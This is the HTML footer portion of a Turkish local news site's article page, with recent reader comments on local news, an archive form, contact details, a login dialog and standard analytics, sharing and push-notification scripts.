reklam...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-ozturk-86-yasinda-h64963.html#comment_277118" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html#comment_277117" title="" >Mahir bey tüm k.maraşlılar adına teşekkür...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-termik-santrallere-filtre-uzatmasini-veto-etti-h64952.html#comment_277116" title="" >nefese hasret kaldık 2022 kadar beklesın...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/egitim-kultur/ozel-yildiz-yildiz-erkekler-satranc-ilce-birincisi-oldu-h20312.html#comment_277115" title="" >Peki buraya neden 1.yi koymamışlarsa hep...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/osman-eryildiz-85-yasinda-h64946.html#comment_277113" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-mermeri-cin-yolunda-h64937.html#comment_277112" title="" >Yillardir cekiliyor belediyeye ne geliri...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html#comment_277111" title="" >tam bir komedi... Erdoğan oylama yapın...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html#comment_277110" title="" >Siz neden teşekkür ediyorsunuz Mahir Bey,size...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/oztunc-dogru-bir-karar-alindi-h64958.html#comment_277109" title="" >Senin Allahına kubanım cep herkülü</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html#comment_277108" title="" >siz degerli chp ve millet vekilimiz olmasaydı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/oztunc-dogru-bir-karar-alindi-h64958.html#comment_277107" title="" >Teşekkürler sayın oztunc iyi ki varsınız...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/unal-dan-cumhurbaskani-erdogan-a-tesekkur-h64957.html#comment_277106" title="" >Vay be insan akliyla bu kadar dalga gecilmez...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-termik-santrallere-filtre-uzatmasini-veto-etti-h64952.html#comment_277105" title="" >milletvekilleri oylamada gurup kararı aldık...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-halkimizin-zehirlenmesine-izin-veremeyiz-h64959.html#comment_277104" title="" >Kanunu ekonomik gerekçelerle savunan zavallı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-halkimizin-zehirlenmesine-izin-veremeyiz-h64959.html#comment_277103" title="" >sanada pravo</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-arslandan-veto-degerlendirmesi-h64961.html#comment_277101" title="" >Elinize emeğinize sağlık diger millet...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" selected>03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" selected>Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('64970', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 